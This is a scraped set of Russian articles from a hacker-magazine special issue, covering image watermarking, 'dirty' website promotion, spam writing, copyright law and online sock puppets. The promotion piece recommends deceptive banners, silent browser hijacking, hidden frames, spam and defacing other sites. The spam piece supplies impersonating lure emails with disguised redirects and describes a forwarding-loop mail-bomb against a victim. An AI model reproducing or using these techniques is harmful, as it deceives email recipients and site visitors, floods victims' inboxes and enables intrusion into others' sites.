Если не открыто фотошоповское окно "Layers", то залезь во вкладку Windows и выбери пункт Layers. Кликнув правой кнопкой на слой, содержащий надпись, залезь в Blending Options и выбери там Bevel and Emboss. Подвигай ручки настроек и выбери тебя устраивающий вариант. Нужно, чтобы надпись приняла эффект объемности, т.е. чтобы буквы получились как бы выгравированными. А теперь надо перетащить эту надпись в ту область картинки, где встречается побольше цветов. Желательно, чтобы цвета очень часто менялись. Если watermark оставить на фоне монотонной области, то его каждый дурак сможет вытащить, а именно от таких и делается защита (умный сам все сделает). На данном этапе получился обычный копирайт, но не watermark. Он пока сильно заметен на изображении и наверняка не делает его лучше. А надо ведь сделать его не сильно привлекающим к себе внимание. Благо, в фотошопе можно управлять результатом цвета, получаемого от наложения одного слоя на другой - Blending Mode (по-русски что-то типа "Метод стыковки"). Метод стыковки надо выбирать для слоя, который находится выше того, на который он накладывается, в данном случае - это слой с надписью. По дефолту стоит метод Normal. При этом методе не происходит никакого смешения цветов, а видимым будет цвет пикселя, находящегося сверху слоя. В фотошопе есть на выбор 22 метода стыковки, каждый из которых имеет свои особенности и применим в своих случаях. О них подробно написано в мануале к фотошопу. Лучший способ узнать, какой нужен, - попробовать все в действии. После небольшой практики будешь интуитивно чувствовать, какой надо использовать. Поэтому попробуй все методы и понаблюдай за результатами. В случае с рассматриваемой картинкой выбор пал на метод Soft Light. При нем получился почти готовый watermark - неплохо сливается с фоном, но его при этом можно легко разглядеть.

Возможно, что даже слишком легко. Поэтому не мешало бы прибавить прозрачности этому Layer'у. В окне Layers есть аж 2 параметра, которыми можно менять прозрачность и насыщенность - Opacity и Fill соответственно. Если выкрутить Opacity до нуля, то тогда слой с копирайтом исчезнет с экрана, а вот если выкрутить Fill, то тогда копирайт превратится во что-то сливающееся с картинкой, но при этом он не станет совсем прозрачным. Результат немного напоминает изображение хищника в фильме "Хищник".

Складываться ощущение, что за картинкой вставили объемные символы и теперь они выдавливают ее. Похоже на водяные знаки? По-моему, даже очень. И времени на их изготовление нужно не более 5 минут. А вот вытащить этот watermark - задача далеко не из легких. Закопирайтенные таким образом картинки дадут знать об их создателе, даже если они все же появятся на других сайтах. А ты, кстати, сможешь предъявить претензии, если найдешь - кому. Или натравить на сайт того воришки кучу хакеров, чтобы тому жизнь медом не казалась :). Правда, к таким жестоким методам надо прибегать, если тебе твое творение очень нравится (или, наоборот, не очень) и ты не хочешь выставлять его на слишком большое обозрение.


Спецвыпуск Xakep, номер #029, стр. 029-038-5, СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

СКАЖИ НЕТ ПЛАГИАТУ - защищаем тексты и картинки в сети

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-038-5

Дополнительная защита картинок

Чтобы затруднить скачивание картинок с сайта, можно воспользоваться наложением невидимых layer'ов с невидимками, чтобы пытающийся скачать картинку не смог скачать ему нужную. Правда, это защита бесполезна во многих случаях - что стоит нажать Print Screen и в том же фотошопе вырезать ее из всего остального. А вот с помощью программ, которые криптуют html-код, можно и запретить нажатие кнопки Print Screen. Конечно, на клаве эта кнопка нажмется, а вот результата от нее будет не очень много - ни хера она не скопирует в буфер изображение экрана.

Подводя итог

Теперь ты знаешь, как можно защитить информацию на своем сайте. Только не надо применять эти методы, если твоя страница не содержит авторских материалов, ибо присвоение чужой интеллектуальной собственности преследуется законом. Даже если это делается в некоммерческих целях. Кодирование кода (ага, прям масло масляное, но иначе не скажешь) используется не так часто на сайтах, как вставка копирайтов на картинки. Нормально знающему HTML не составит труда наклепать страницу, если он увидит ее. Правда, со всякими картинками и иконками ему скорей всего придется помучаться. А вот установка копирайтов на графических трудах может помочь разрекламировать твой сайт. Представь себе, что ты увидел 3.14здатую картинку на каком-то сайте, а на картинке URL явно не того сайта. Держу пари, что процентов 30 увидевших отправятся на указанный адрес, чтобы посмотреть другие работы автора. Намного хуже, когда на разных сайтах видишь разные копирайты на одних и тех же картинках. Это только показывает непорядочность веб-мастеров, которые стали накладывать свои права на чужой труд. Валить надо такие сайты! Вот :).

Никто и ничто не может дать 100-процентную гарантию сохранения авторских прав в сети.

Использование криптографии - способ защиты HTML-кода от просмотра.

Watermark - лучший способ сохранить за собой авторство картинки при минимальных затратах.

Не стоит делать защиту от профессиональных веб-мастеров - те сами все быстрей придумают.


Спецвыпуск Xakep, номер #029, стр. 029-042-1, 10 ГРЯЗНЫХ МЕТОДОВ раскрутки сайта

10 ГРЯЗНЫХ МЕТОДОВ раскрутки сайта

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-042-1

(alex-sun@mtu.ru)

Сделал ты пагу, нарегился в партнерских программах, чтобы бабла срубить, рекламы повесил, а вот только результата все нет и нет.

А ведь и хостинг уже оплачен. Пока там тебя поисковики найдут. А то, может, и найдут, но при поиске выдавать будут странице на 15-ой и дальше. Так о тебе долго никто не узнает. Получится, что ты зря старался сделать сайт. Если ты не хочешь оказаться в такой ситуации, то наш топ поможет тебе в кратчайшие сроки резко прибавить посещаемость на сайте. Ибо речь пойдет о грязных методах раскрутки.

Первые шаги раскрутки

Как ни странно, встречаются такие уникумы, которые считают, что если они сделали страничку и выложили ее в Инете, то все про нее уже знают и заходят. Случайно в Инете редко кто куда попадает, а если такое уж и произошло, то едва ли это повторится. Поэтому, если ты хочешь, чтобы о твоем сайте узнали, надо для начала зарегить его в таких известных поисковиках, как yandex.ru, google.com, rambler.ru, aport.ru, и во всяких каталогах. Вот ты зарегил свой сайт в этих поисковиках, написал там что-то. Прошла пара недель, а счетчик на сайте до сих пор не показывает приход посетителей. И почему, как ты думаешь? Самый сложный этап в раскрутке сайта - начальный, это когда у тебя нет ни стабильного притока людей, ни позиций в рейтингах, и никто о тебе не знает. Надо сначала взяться за дело всерьез, а потом уж не сильно напрягаться и жить на доходы с сайта.

1. Использование левых keyword'ов

Поисковые системы периодически проводят индексацию сайтов, которые были в базе, а также недавно добавленных. Роботы-индексаторы обращают внимание на текст на страницах, наличие заголовков, meta-тэги. Это можно использовать, чтобы получше тебя находили. Строка с кивордами выглядит вот так:

<META NAME="keywords" content="разные ключевые слова для поисковиков">.

После слова content идут те самые ключевые слова, на которые поисковики должны обращать внимание. Что мешает вбить слова, которые заведомо являются популярными при запросах, например, халява, порнуха, телки, эротика и т.п. Довольно быстро приход с поисковиков должен возрасти.

+ повышение позиции в поисковиках и каталогах;

- могут удалить из базы и добавить в черный список.

2. Анимационные баннеры

Если ты еще не обрезал баннеры на своей машинке, то наверняка видел область броузера, в которой был изображен процесс, визуально похожий на форматирование харда, и кнопочка "отмена". Вот ламер, который не понимает, что такого через броузер сделать просто нельзя, наверняка потянется к кнопке "отмена" и нажмет ее. А в результате окажется на сайте. Это один вариант баннеров. Также неплохо на повышение CTR'а сказываются баннеры, содержащие начало анекдота и полосу прокрутки, а также обнаженная девица с подписью "Сделаем это здесь". Такие методы рекламы неслабо повысят посещаемость сайта.

+ высокий CTR от показов;

- разочарование кликнувшего на телку;

- нужно потратить немного денег на покупку баннеров.

3. Добавление в избранное и становление стартовой страницей

Понятное дело, это будет проходить без ведома юзеров. Зачем спрашивать, если это можно не делать. От этих методов почти каждый юзер попадет на сайт как минимум еще один раз.


Спецвыпуск Xakep, номер #029, стр. 029-042-2, 10 ГРЯЗНЫХ МЕТОДОВ раскрутки сайта

10 ГРЯЗНЫХ МЕТОДОВ раскрутки сайта

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-042-2

+ небольшой размер кода;

- не очень большой приток людей;

- такой код обрезается многими программами.

4. Pop-up'оыве и pop-down'овые окна

Окна, которые открываются поверх остальных или сворачиваются при загрузке страницы сайта. Надо только найти чела, у которого на сайте посещаемость примерно равна твоей, и договориться, что на каких-то страницах будет вставлен код самооткрывающихся окон. Если не нашел партнера по несчастью, то можно найти ресурс с хорошей посещаемостью и попроситься там повисеть в pop-up'ах. Скорее всего, за некоторое вознаграждение ты повисишь какое-то время.

+ эффективно;

+ быстрое поднятие в рейтингах;

+ небольшой код;

- надо искать партнера;

- обрезается многими программами.

5. Невидимые фреймы

Это очень аналогично пункту выше, только в этом случае об открытии еще одной страницы можно только догадываться. Никто ее не видит, никому она не мешает, а она открывается. Невидимые фреймы трудно отследить админам всяких топ-служб. Так что метод использования невидимых фреймов однозначно положительный.

+ все из пункта 4;

+ почти невозможно отследить накрутку;

+ не раздражает юзеров, как pop-up'ы;

- трудно найти чела, который согласится тебя разместить;

- никто о тебе так и не узнает.

6. Подписи в гостевых книгах и форумах

Можно, конечно, постить и умные вещи, но для раскрутки надо юзать то, что привлечет побольше внимания людей. Это может быть что-то типа "Меня зовут Аня, 18 лет, блондинка. Выложила свои фотки здесь: http://winfo.org". Очень много переходов на сайт будет сделано с такого поста. Только для таких целей надо выбрать форум средней паршивости. На посещаемых форумах модерация хорошо работает, так что очень скоро придется повторно писать.

+ низкие затраты при высоком притоке;

- периодически надо оставлять новые посты (желательно с новым слоганом).

7. Выкладывание учебной информации

Это хорошо для студентов. Как бы невзначай надо объявить как можно большему числу народа, что отсканированную лекцию ты разместил на своем сайте, правда точную линку не помнишь. Ну и даешь адрес сайта. Сделать это можно как в институтском форуме, так и простым объявлением "Шпоры, лекции, решения задач по теории неожиданности. http://winfo.org". Не беда, что никаких лекций там нет, но приход-то уже будет осуществлен. Конечно, за это могут и обидеться, но тогда можно и правда что-нибудь выложить :).

+ небольшой приход людей точно будет;

- разовый метод.

8. Анкеты на сайтах знакомств

Однажды один мой друг в результате попытки подставы сторонними лицами заимел посещаемость на его хоум-паге порядка 100-150 человек в день. Причем обычно было раз так в 10 меньше. Заинтересовавшись, откуда столько набралось, он полез посмотреть в статистике spylog'а (тогда он еще был фришный). Стал он просматривать ссылки, по которым были сделаны приходы. Очень был удивлен, увидев среди ссылающихся страниц домен одного известного сайта сексуальных меньшинств. Кликнув по линке, он натолкнулся на анкету сайта знакомств, в которой были указаны и его аська, и его мыло, и УРЛ его странички. Так вот откуда трафик такой! Так бы все и было оставлено, да в аську стали ломиться геи и чего-то спрашивать. После пары писем админу анкета была удалена. Но факт эффективности от оставления УРЛы в анкетах сайтов знакомств остается фактом.


Спецвыпуск Xakep, номер #029, стр. 029-042-3, 10 ГРЯЗНЫХ МЕТОДОВ раскрутки сайта

10 ГРЯЗНЫХ МЕТОДОВ раскрутки сайта

Леха ББ aka Alexys

Спецвыпуск Xakep, номер #029, стр. 029-042-3

+ простота и эффективность метода;

- могут завалить письмами, если на паге оставлено мыло.

9. Спам-реклама

Сейчас этот метод очень часто используется. Многие ящики просто заваливают спамом. Такое ощущение, что админы некоторых почтовых серваков сами взяли и продали свои базы (с МТУ такое наверняка произошло - на мой МТУ-шный ящик приходит не меньше 10 писем со спамом, причем адрес не был засвечен нигде до начала прихода писем). Далеко не все удаляют такие письма не читая. Многим очень интересно, что им там прислали. Вот и лезут они по линкам, находящимся в тексте письма.

+ однажды завладев базой e-mail'ов, можно повторять рекламу когда захочется;

- достает нормальных людей.

10. Deface сайта

Заменить стартовую страницу на чудом раскрученном ресурсе и сделать на странице редирект на твой сайт. За это можно и люлей хороших схлопотать, но результат будет просто реальный. Только лучше это делать ненадолго, чтобы админы сайта не успели ни о чем пронюхать. А то тогда твой сайт из дауна не выйдет.

+ мгновенная реклама;

- трудно поломать сайт;

- могут поиметь за это.

О чем надо помнить

Грязная раскрутка помогает только на короткое время. Во всех нормальных системах поиска и каталога существуют модераторы. Если ты обманешь эти системы, то рано или поздно тебя обнаружит модератор и либо исправит все сам, либо просто удалит тебя из каталога. Тогда ты многое потеряешь. Когда будешь выбирать методы для раскрутки, подумай, сколько сил, денег и времени есть у тебя в наличии, а также сколько народу и в какое время ты хочешь привлечь на сайт. Проанализируй это и приступай к действию. Нужного результата модно добиться только в случае, если известно заранее, чего ты хочешь добиться. Для проверки эффективности воспользуйся системой сбора статистики (сделай свою или воспользуйся готовой), чтобы знать, откуда приходят на сайт. Там уже будет процентов на 90 ясно, какая реклама дает реальную пользу, а какая только отнимает время и деньги.


Спецвыпуск Xakep, номер #029, стр. 029-044-1, УМНЫЙ СПАМ - реклама, которую прочтут

УМНЫЙ СПАМ - реклама, которую прочтут

Андрей Каролик

Спецвыпуск Xakep, номер #029, стр. 029-044-1

(andrusha@sl.ru)

В день я получаю не менее десяти писем, даже если мне никто не пишет ;). И все благодаря трепетному отношению спамеров к моему засвеченному ящику в Инете. Что только не сыпется ко мне в ящик: сколько стоит квартира в Уренгое, как увеличить член и что мне даст глубокая очистка кишечника... Список лучше не продолжать :). Все подобные письма удаляются одним кликом и без прочтения. Но недавно мне попалось письмо, которое я с удовольствием прочитал до конца и только потом (!) понял, что это реклама, а меня грязно поимели в голову :). О том, как написать такое письмо, я тебе и поведаю...

ЧТО ТАКОЕ СПАМ?

Спам (spam, junk mail, bulk mail) - массовая рассылка рекламных сообщений на почтовые ящики, в форумы или гостевые книги. Письмо приходит от неизвестного дяди, но с навязчивым содержанием, при этом отправителя совершенно не интересует, нужно это тебе или нет. Чаще всего это коммерческая реклама, но иногда попадается агитация личных страничек, всевозможные письма счастья или банальные вирусы :).

Наиболее эффективный способ борьбы со спамерами - фильтрация входящих писем. А вот на соблазнительную ссылочку "нажмите сюда, чтобы перестать получать эти сообщения" лучше не тыкать. Ты станешь получать не меньше, а даже больше спама, чем до этого, показав спамеру, что твой ящик жив и читается.

Допустим, у тебя есть прикольная пага, которую ты хочешь порекламить. Дыбаешь базу с адресами ничего не знающих жильцов Инета и капаешь им на мозги. По сути задача сводится к тому, чтобы привлечь внимание заголовком письма, заинтересовать содержимым и заставить перейти по ссылке на свою пагу. Итак, по пунктам.

ЗАГОЛОВОК

Заголовок включает в себя информацию об отправителе (from) и тему сообщения (subject). Еще скачивая почту и не прочитав содержимое письма, получатель только по теме может решить, читать сообщение дальше или удалить без прочтения. Поэтому не стоит писать в теме "Посмотри мою пагу", "Привет, придурок" или "Зайди, не пожалеешь", эти письма будут первыми претендентами на удаление.

Также не стоит подписывать ящик ником или фамилией (отображается в поле from), они однозначно вызовут подозрение. Идеальный вариант - ограничиться именем, причем женским :). Большая часть активных инетчиков - мужики, а девчонки на женские имена все равно реагируют вполне адекватно. Тема письма должна быть очень простой и житейской:

- Привет от Маши! (должно соответствовать имени, которым подписан ящик)

- Скучаю...

- Почему не пишешь?

- Фото от Даши.

- Куда пропал(а)?

- Ты забыл(а) у меня свои носки (или трусы). ;)

Наиболее предпочтительны односложные и бесполые фразы, которые дают минимум информации, но интригуют и заставляют читать письмо дальше. Придерживайся правила: пиши такой заголовок, который заинтересовал тебя же самого.

СОДЕРЖИМОЕ

Сам текст письма - приманка, не более того. То есть много лапши и одна (или несколько) ссылка. И ни единого (!) слова про твою пагу. Далее встает вопрос, как начать письмо. Написать "это я" - не написать ничего :). Проще всего гнуть линию знакомства в чате, не указывая, в каком именно и под каким ником. Каждый второй (если не первый) просиживает в WEB или IRC-чате штаны (или юбку), постоянно знакомится с новыми собеседниками и чисто физически не способен запомнить всех тех, с кем общается. Пусть гадает :). Больше общих слов и юмора, больше неопределенности и интриги. А ссылку нужно преподнести как ключ к разгадке этой маленькой тайны. Если сделать все грамотно, то никто не удержится от соблазна узнать подробности.


Спецвыпуск Xakep, номер #029, стр. 029-044-2, УМНЫЙ СПАМ - реклама, которую прочтут

УМНЫЙ СПАМ - реклама, которую прочтут

Андрей Каролик

Спецвыпуск Xakep, номер #029, стр. 029-044-2

Кроме знакомства, в чате можно сослаться на якобы общих знакомых, указывая только имена. Имен не так много, так что в большинстве случаев ты попадешь в точку, если, конечно, не напишешь редких имен типа Эльвиры или Гули :).

Не помешает надавить в письме на чувства, желания, соблазны :). Если ты даже неудачно попадешь с именем и текстом, то это может быть воспринято, как письмо кому-то другому. Любопытство сделает свое дело :).

Очень трудно написать письмо, адресованное сразу парню и девчонке. Все равно будут глаголы, окончания которых придется явно определять. Варианта два: либо делать письмо максимально коротким, пытаясь сделать весь текст бесполым, либо делать его якобы от девушки. Если девушка девушке может что-то написать, то парень парню значительно реже, и своих друзей парень знает наизусть, а вот девчонок... ;) /

Но и тут все можно испортить одним неверным движением. Если ты в письме пишешь, что тебя зовут Маша, а даешь ссылку на сайт http://alex.narod.ru, то идиоту понятно, что это обыкновенная подстава. Поэтому потрать лишнее время и зареги что-то типа http://masha.narod.ru, сделав адрес http://masha.narod.ru/photo/about.html. А уже оттуда сделай обычную переадресацию в нужное место (<meta http-equiv="refresh" content="1;url=настоящий_урл">). Вот и остерегайся после этого писем от всяких Маш ;).

ПРИМЕРЫ

Если ты впитываешь хуже прокладок :), то приведу тебе несколько наглядных примеров. В них ты прочувствуешь, как надо писать и что берет за живое. Учись, студент :).

-----Original Message-----

From: Любимая <natasha_in_love@mail.ru>

To: ...

Subject: отсканила свое фото

Привет!

Надеюсь, еще меня не забыл? Мы тогда так долго болтали, ты обещал написать и не написал :(. Забыл почту или надоела? А может обиделся, что не смогла дать свою фотографию? Но у меня честно был сломан сканер. Специально на работе для тебя отсканировала и выложила на свою домашнюю страничку:

http://natasha_in_love.narod.ru/photo.html

Не лучшего качества, но зато одна из последних. В реале я еще лучше :). Не забывай, пиши!

-----Original Message-----

From: Анна <cutie_anna@yandex.ru>

To: ...

Subject: скучаю по тебе...

Приветик!

Не удивляйся, я сменила ящик, а от старого забыла пароль :). Хорошо, хоть твой не забыла. Ящик, в смысле :). Ты хоть скучаешь? Или уже забыл? Я была у подружки, фоток понаделала новых. Хочешь посмотреть? Некоторые очень даже ничего ;).

http://cutie_anna19.narod.ru/photos/photo7.html

Ты когда, вообще, свободен? Может сходим куда? Жду ответа!

-----Original Message-----

From: Марина <marta813@yandex.ru>


Спецвыпуск Xakep, номер #029, стр. 029-044-3, УМНЫЙ СПАМ - реклама, которую прочтут

УМНЫЙ СПАМ - реклама, которую прочтут

Андрей Каролик

Спецвыпуск Xakep, номер #029, стр. 029-044-3

To: ...

Subject: идешь с нами на шашлыки?

Привет.

Мне твой адрес дала Ленка. Сказала, что с тобой весело. Вот. А мы тут собираемся небольшой компашкой на шашлыки, Лена тоже будет, решайся :). Идем в эти выходные, куда - пока решаем. Если есть идеи, пиши. По сколько денег и кто идет, смотри тут:

http://marta813.narod.ru/shashliki/index.html

Да, можешь с собой еще кого-нибудь из друзей взять, а то у нас перебор с девчонками :). Но только мирных и сильно не пьющих :). Короче, смотри, кто идет, зови друзей, и жду ответа!

Вот в таком аспекте :). Напряги фантазию, и все будет чики-пуки. Но запомни - пользоваться грязными способами раскрутки надо осторожно, ибо если ты засветишь свой настоящий адрес или IP - неприятностей потом не оберешься. Так что береги себя и не поддавайся на подлый спам.

З.Ы. Кстати, я тут выложил свои свежие фотки на http://www.gagarinclub.ru/, может заглянешь? :)))))

СПАМОВЫЙ УДАР НИЖЕ ПОЯСА

Если спамеры достали тебя по самое не балуйся, есть одно эффективное лекарство. Регистрируешь максимально возможное количество ящиков на бесплатных почтовиках: spammer_dead@mail.ru, spammer_dead@yandex.ru, spammer_dead@rambler.ru, spammer_dead@inbox.ru, spammer_dead@newmail.ru, spammer_dead@pisem.net, spammer_dead@yahoo.com и т.д. Далее в настройках каждого ящика ставишь форвард на адрес жертвы и все остальные ящики. Получается замкнутый круг с печальными последствиями :). Чтобы шоу началось, посылаешь письмо на любой из этих ящиков.

Не нужны ни скрипты, ни проги, ни шеллы, все настолько просто. Но проблема есть. Во-первых, ограничение ящика по объему - рано или поздно он переполнится, и процесс встанет, нужно будет его вычищать и запускать вечный двигатель заново. Во-вторых, многие бесплатные почтовые сервера уже испытали на своей шкуре этот прикол, поэтому при форварде посылают дополнительное письмо с подтверждением форварда. Ищи почтовые сервера, которым без разницы, куда и что форвардить, и отрывайся :).


Спецвыпуск Xakep, номер #029, стр. 029-046-1, ПРАВОВОЙ ЛИКБЕЗ - немного об авторском праве

ПРАВОВОЙ ЛИКБЕЗ - немного об авторском праве

GLAZъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-046-1

Ты не спал ночами, не ел, не мылся, просиживал драгоценное время за творением супер-мега-дизайна для своей хоумпэйдж, в то время как все твои друзья смотрели ожесточенный матч Зенит - Спартак. И вот, наконец, он готов! Пришло время открыть твое чудо благородной публике...

Но как же защитить свое детище, чтобы через несколько дней ты не обнаружил до боли знакомый диз в неположенном ему месте :)? Для этого есть Закон об авторском праве. Страшно, да? Представляются суды, адвокаты, прокуроры... Забудь, это после. На самом деле, все гораздо проще. Слушай (т.е. читай), и все будет понятно.

Закон

Закон позволяет тебе иметь личные неимущественные и имущественные права. Не бойся, сейчас объясню, что к чему.

Неимущественные права - это то, чем ты обладаешь морально. То есть гордость за твои труды. И никто эту гордость у тебя не отнимет! Эти права, помимо гордости, позволяют тебе признаваться в качестве автора. То есть ты всем своим подругам можешь разболтать, что диз сделал именно ты или статью написал именно ты. Можешь решать, что с ним делать дальше. Далее ты можешь подписаться под своим дизайном как Вася Пупкин, а можешь как Марк Аврелий (если, конечно, этот псевдоним не зарегистрирован как товарный знак). Тоже решай сам. После того как ты пихнул дизайн в Инет, ты можешь его отозвать, если твои поклонники достали вопросами, как ты так умудрился его сделать. И в конце концов, ты можешь защищать свое детище от всяких уродов, которые будут исправлять его, дополнять или оклеветывать его и тебя. Все это обеспечивают "моральные права".

К имущественным относится то, на что ты можешь наложить свою грязную лапу. Ты можешь разрешить растиражировать свой дизайн или статью, как тебе захочется, можешь побежать и кому-нибудь его продать или подарить, можешь где-нибудь напечатать. Если ты написал пьесу "Колобок против терминатора", то можешь ее сыграть в театре или рассказать по радио или телеку, можешь даже по кабельному ТВ или по Интернету это сделать, а можешь разрешить какому-нибудь ламерикосу перевести свой мегатруд на японский язык. Вот сколько всего ты можешь сделать, сотворив свой труд. И ты всегда можешь рассчитывать на гонорар за него. Полный перечень смотри на врезке.

Правда, если ты сотворил свое детище на работе, то имущественные права будут принадлежать твоему работодателю, но моральные права у тебя никто не отнимает.

Практика

Так где же мы можем зарегистрировать свой шедевр? Если речь идет о дизайне, то регистрировать его нигде не надо. Достаточно поставить в конце значок (с), твое имя и год первого издания. Если же ты обновляешь свой диз ежеминутно, то ставишь период. После всего этого можешь написать: "Найду любого козла, кто сопрет мой диз или его элементы. Жизнь сахаром не покажется!". Хотя можешь всего этого и не указывать, в любом случае ты - правообладатель. Можешь смело бежать в суд.

Существует до фига организаций, которые занимаются вопросами о правах авторов. В России это:

- Российское авторское общество (РАО), www.rao.ru. Тут защищают твои права при использовании твоего шедевра по телеку, радио и другим средствам массовой информации.


Спецвыпуск Xakep, номер #029, стр. 029-046-2, ПРАВОВОЙ ЛИКБЕЗ - немного об авторском праве

ПРАВОВОЙ ЛИКБЕЗ - немного об авторском праве

GLAZъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-046-2

- Российское общество по мультимедиа и компьютерным сетям (РОМС), www.roms.ru. Тут защищают права авторов и других мэнов, чьи произведения крутятся в Инете.

- Российское агентство по патентам и товарным знакам (www.rupto.ru). Орган, на который возложена обязанность по управлению политикой нашей Родины в сфере авторских прав на интеллектуальную собственность.

Так что в эти организации ты можешь обращаться, если кто-нибудь тебя обидит.

Вот, например, в РАО ты можешь зарегистрировать свое произведение (у них это называется "депонированием"). Но сначала надо определиться с термином "интеллектуальная собственность", или, как еще называют, "объект авторского права".

Итак, интеллектуальная собственность - это все то, что ты надумал собственной репой. Т.е. продукт твоей мыслительной деятельности. Вот его все пытаются усердно защитить, так как у некоторых (как я) мозги варят отлично, а у некоторых - так себе. Авторское право, как талдычат во всех законах, возникает в момент создания продукта. То есть придумал - хоп, и сразу оно под защитой закона. Вот так!

Но есть исключения. Не являются объектами авторского права идеи, методы, открытия и т.д.; официальные документы (договоры); государственные символы, после того как они были приняты; произведения народного творчества и информационные сообщения.

При использовании твоего творения с тобой обязательно должны заключить письменный договор, так как при договоре в устной форме не происходит никакая передача авторских прав. Это в основном относится к размещению произведений на сайте в Инете. Это получается потому что, во-первых, лишаешься вещдоков, а во-вторых, не согласовываются другие пункты договора передачи авторских прав :(.

И еще в Инет нельзя без разрешения пихать книги в электронном виде под видом электронной библиотеки. Как известно из закона, библиотекам разрешают ксерануть книжки. Но он совершенно не разрешает тебе оцифровать и выкладывать книги автора в Инет без договоренности с ним. Так что будь осторожен.

Если захочешь открыть музыкальный портал, то тебе придется раскошелиться на вознаграждение исполнителям и объектам смежных прав. Саму лицензию на открытие дадут бесплатно в РОМС. Так что дуй туда.

Кстати, на правах можно заработать. Как? Ну, например, продавая права на пользование произведением другим лицам. Для того чтобы не остаться в проигрыше, ты должен хорошо знать три момента: где хорошо платят, внимательно читать договоры, которые тебе суют, и как ты сможешь проконтролировать выполнение этого договора. Иногда лучше стать членом какой-нить организации или ассоциации типа РАО или РОМС.

Чтобы защитить свои права, ты должен: сначала знать их! Потом всем рассказать об этом. Иногда этим можно попугать :). Желательно, если ты заранее побеспокоишься о защите своих прав. Как ты знаешь, в последний момент метаться оказывается поздно. Тщательно проследи за составлением договора, лучше в присутствии юриста, и желательно своего :). Кстати, в суде у тебя есть большие шансы сдуть хорошую денежную пенку с нарушителя прав. Это еще один стимул контролировать выполнение авторских прав.


Спецвыпуск Xakep, номер #029, стр. 029-046-3, ПРАВОВОЙ ЛИКБЕЗ - немного об авторском праве

ПРАВОВОЙ ЛИКБЕЗ - немного об авторском праве

GLAZъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-046-3

Закругляюсь

Ну вот, я рассказал тебе про твои права. Надеюсь они тебе помогут в твоем творчестве. Удачи тебе. (с) 2002, GLAZъ.

Авторское право, как талдычат во всех законах, возникает в момент создания продукта.

Можешь смело бежать в суд.

Далее ты можешь подписаться под своим дизайном как Вася Пупкин, а можешь как Марк Аврелий.

Согласно статье 16 Закона РФ "Об авторском праве и смежных правах" ты, создав любое произведение, обладаешь следующими правами:

- воспроизводить произведение (право на воспроизведение);

- изготовление одной или более его копий в материальной форме;

- распространять экземпляры произведения любым способом:

- продавать, сдавать в прокат и так далее (право на распространение);

- импортировать экземпляры произведения в целях распространения, включая экземпляры, изготовленные с разрешения обладателя исключительных авторских прав (право на импорт);

- публично показывать произведение (право на публичный показ);

- публично исполнять произведение (право на публичное исполнение);

- сообщать произведение (включая показ, исполнение или передачу в эфир) для всеобщего сведения путем передачи в эфир и (или) последующей передачи в эфир (право на передачу в эфир);

- сообщать произведение (включая показ, исполнение или передачу в эфир) для всеобщего сведения по кабелю, проводам или с помощью иных аналогичных средств (право на сообщение для всеобщего сведения по кабелю);

- переводить произведение (право на перевод);

- переделывать, аранжировать или другим образом перерабатывать произведение (право на переработку).

А также всем объемом личных неимущественных прав, таких как:

- право признаваться автором произведения (право авторства);

- право использовать или разрешать использовать произведение под подлинным именем автора, псевдонимом либо без обозначения имени, то есть анонимно (право на имя);

- право обнародовать или разрешать обнародовать произведение в любой форме (право на обнародование), включая право на отзыв;

- право на защиту произведения, включая его название, от всякого искажения или иного посягательства, способного нанести ущерб чести и достоинству автора (право на защиту репутации автора).


Спецвыпуск Xakep, номер #029, стр. 029-048-1, ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

ПО ТУ СТОРОНУ МАСКИ - свежий взгляд на виртуалов

mindw0rk (mindw0rk@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-048-1

За время обитания в сети я встречал много мнений о том, почему люди заводят виртуалов. "Потерянные, глубоконесчастные индивиды - они создают себе второе, менее ущербное Я", - радостно пишут бульварные журналюги, "Хитрожопые прыщавые малолетки, которым просто нефиг делать", - захлебываются разведенные юзвери, "Этим страдают больные шизофренией люди, лечением которых нужно заниматься всерьез", - авторитетно заключают психологи. Подобных мыслей много, но я редко встречал тексты, рассматривающие обратную сторону маски. Попытаюсь исправить это упущение.

Красавицы и Джеймсы Бонды

Виртуальными персонажами люди пользовались задолго до появления Интернета. Во времена первых телефонов находчивые приколисты сообразили, что сей девайс дает отличную возможность безболезненно подшучивать над другими людьми. Иногда периодические пранки (prank - шутка, выходка) выливались в целое хобби, которому уделялось много времени. Телефонные хулиганы даже объединялись в группы, названивая по случайным номерам и разыгрывая целые представления по заранее оговоренному сценарию. С появлением "мостов" - телефонных конференций, где одновременно могли общаться несколько человек, виртуальные персонажи стали обычным делом. Толстая домохозяйка могла представиться обворожительной красавицей и часами проводить время у телефона, купаясь во внимании галантных, представительных поклонников. Поклонники - эти Джеймсы Бонды во плоти, в свою очередь, нередко оказывались закомплексованными ребятами, прикованными к инвалидной коляске или с рождения слепыми. Для многих людей, обделенных природной красотой и полноценностью, маска виртуала давала то, чего они не могли получить в реальной жизни.

В начале 80-х виртуалы стали появляться на станциях BBS. Компьютеры в это время только начинали завоевывать массовый рынок, подавляющее большинство пользователей составляли молодые ребята, увлеченные электроникой и передовыми технологиями. Девушки на BBS встречались крайне редко, поэтому пользовались огромной популярностью. Достаточно было назваться женским ником, как тебя сразу же окружали десятки потенциальных бойфрендов. Крутить ими и наблюдать за попытками сблизиться виртуальщикам было, несомненно, забавно. Да и полезно не меньше - достаточно только намекнуть о своей привлекательной внешности, голубых глазах и белокурых волосах, как новый приятель сразу выражал готовность оказать любую посильную помощь.

С тех пор прошло 20 лет. Глобальная паутина охватила весь мир, создав превосходные условия для общения и знакомств. Вместе с тем, сделав возможной полную анонимность. Если раньше при желании можно было обличить виртуала, установив на компьютере борды АОН и перезвонить по зафиксированному номеру, сейчас, с бушующим разнообразием проксей и анонимайзеров, остается только полагаться на свою подозрительность, наблюдательность и знание психологии. С ростом популярности и доступности сети непрерывно растет количество людей, веселящихся за счет доверчивых соседей.

Виртуальный синдром

